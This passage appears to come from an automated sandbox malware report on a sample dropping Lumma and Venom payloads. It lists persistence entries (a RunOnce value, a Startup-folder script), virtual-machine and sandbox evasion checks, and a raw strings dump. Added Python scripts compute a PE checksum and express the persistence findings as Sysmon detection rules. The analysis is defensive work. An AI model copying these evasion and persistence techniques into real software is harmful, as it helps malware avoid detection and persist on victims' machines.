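    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)     # i386, 1 section, PE32 opt hdr, EXE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, OPTIONAL_HEADER_CHECKSUM, stored_checksum)
    section = bytes(range(256)) * 2
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section


if __name__ == "__main__":
    unchecked = build_sample_pe(0)       # what the report's "real checksum: 0x0" entries look like
    stored, computed, ok = verify_checksum(unchecked)
    print(f"real checksum: {stored:#x} should be: {computed:#x} match={ok}")
    fixed = build_sample_pe(computed)
    print("after writing the computed value:", verify_checksum(fixed)[2])
    print(f"section entropy: {shannon_entropy(unchecked[-512:]):.2f} bits/byte")
```

Because the CheckSum field itself is skipped during the summation, writing the computed value back into the header makes the image verify without changing the result, which is exactly why a post-link patch that forgets this step leaves the 0xfa47/0xafb3 style mismatch behind.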
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EF14.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2D42.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adjijwj Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8EC7.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Jump to dropped file

Boot Survival

Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs Jump to dropped file
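The two persistence mechanisms recorded above are a RunOnce value with a randomised name and a .vbs dropped into the per-user Startup folder. The notable detail is the writer: the registry value is created by explorer.exe, the same process that drops 2D42.exe, 8EC7.exe, EF14.exe and adjijwj, so the code doing this is running inside the shell rather than in a dropped binary. As an added example that is not part of this report or of Joe Sandbox, the following Python expresses those observations as detection rules over Sysmon-style events. The event records are constructed to mirror the report's lines, plus two benign controls; the field names follow Sysmon's FileCreate (EventID 11: Image, TargetFilename) and RegistryEvent (EventID 13: Image, TargetObject) schema. Two practical caveats are built in: Sysmon renders HKCU as HKU\<SID>\..., so the rule matches the key tail rather than the hive, and the value-name heuristic is deliberately coarse and should be tuned against local baseline.

```python
import re

# Constructed Sysmon-style events modelled on the report's Boot Survival and
# dropped-file lines, plus two benign controls that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#5685_8yUscnjrUY"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\2D42.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\adjijwj"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",          # benign: installer's own Run value
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",                    # benign: user saving a document
     "TargetFilename": r"C:\Users\user\Documents\notes.txt"},
]

# Match the key tail: Sysmon logs HKCU values under HKU\<SID>\..., not "HKCU".
AUTORUN_VALUE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\(?P<name>[^\\]+)$", re.I)
STARTUP_SCRIPT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)$", re.I)
USER_DROP_DIR = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\(?P<name>[^\\]+)$", re.I)
RANDOM_VALUE_NAME = re.compile(r"#|\d{4,}")   # coarse heuristic; 'Update#5685_8yUscnjrUY' trips it
# The shell never legitimately writes autoruns or drops executables into AppData;
# when it does, injected code is running inside it.
SHELL_HOSTS = {"explorer.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _looks_like_dropped_binary(name: str) -> bool:
    # PE extension, or no extension at all (the report's 'adjijwj' is a PE with no suffix)
    return bool(re.search(r"\.(exe|dll|scr)$", name, re.I)) or "." not in name


def detect(events):
    """Return one finding per triggered rule: {'rule', 'process', 'target'}."""
    findings = []
    for ev in events:
        proc = _basename(ev["Image"])
        if ev["EventID"] == 13:
            m = AUTORUN_VALUE.search(ev["TargetObject"])
            if not m:
                continue
            if proc in SHELL_HOSTS:
                findings.append({"rule": "autorun_written_by_shell", "process": proc, "target": ev["TargetObject"]})
            if RANDOM_VALUE_NAME.search(m.group("name")):
                findings.append({"rule": "autorun_suspicious_value_name", "process": proc, "target": ev["TargetObject"]})
        elif ev["EventID"] == 11:
            path = ev["TargetFilename"]
            if STARTUP_SCRIPT.search(path):
                findings.append({"rule": "script_in_startup_folder", "process": proc, "target": path})
            m = USER_DROP_DIR.search(path)
            if m and proc in SHELL_HOSTS and _looks_like_dropped_binary(m.group("name")):
                findings.append({"rule": "binary_dropped_by_shell", "process": proc, "target": path})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['rule']:32} {f['process']:16} {f['target']}")
```

The RunOnce event fires two rules at once (shell writer and random-looking name); either alone is worth a look, together they are a strong signal. Run against real telemetry, the shell-writer rule is the one to keep unconditional, and the value-name heuristic is the one to tune.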

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\adjijwj:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX (48 identical entries)
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process information set: NOOPENFILEERRORBOX (40 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (41 identical entries)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (41 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe File Queried: C:\INTERNAL\__empty
Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Users\user\AppData\Roaming\adjijwj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\adjijwj API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\adjijwj API/Special instruction interceptor: Address: 7FFE2220D584
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, 00000000.00000002.1718193186.00000000005F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKNY
Source: adjijwj, 00000003.00000002.1941695773.0000000000540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E000710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E01A290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 1E01DA80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 15F3A620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Memory allocated: 15F53FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 150000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 4900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 4900000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmnet.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmmouse.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxtray.exe
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxhook.dll
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxservice.exe
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 413 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2145 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 789 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2128 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 873 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Window / User API: threadDelayed 2584 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1638
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe TID: 6876 Thread sleep time: -214500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6880 Thread sleep time: -78900s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6048 Thread sleep time: -34600s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6908 Thread sleep time: -32300s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7108 Thread sleep time: -50000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6876 Thread sleep time: -212800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 4904 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 1516 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 2448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe TID: 6828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2248 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4900 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 4556 Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 4268 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6904 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641607000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF6416071AFh 7_2_00007FF641607000
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C87FBAE FindFirstFileExW, 20_2_6C87FBAE
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8CC1DF GetSystemInfo,VirtualAlloc, 19_2_6C8CC1DF
Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1700000036.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1696258763.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1700000036.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1697734591.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1699388658.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: EF14.exe, 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
